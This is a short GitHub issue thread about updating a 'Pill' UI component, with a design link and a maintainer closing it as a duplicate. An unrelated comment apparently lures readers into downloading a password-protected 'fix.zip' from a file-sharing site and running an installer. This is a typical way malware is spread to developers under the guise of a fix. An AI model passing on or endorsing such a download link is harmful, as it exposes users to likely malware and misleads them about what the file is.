### ISSUE TITLE
Pill 2.1 update

### ISSUE THREAD

**Issue by grod220** [penumbra-zone/web#1745] opened 2024-08-29 14:49 UTC
Updates: https://www.figma.com/design/WKgXSVVK3L0EI0sr9Hwjoa/penumbra-UI-library?node-id=237-15466&node-type=FRAME&cc-version-id=6488412680&m=dev

- Styles changed
- New variants

**Comment by wahyu-n** [comment] 2024-08-29 14:56
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by VanishMax** [comment] 2024-08-30 13:20
Duplicate of #1730

**Closed by VanishMax** 2024-08-30 13:20 UTC
Labels: ui
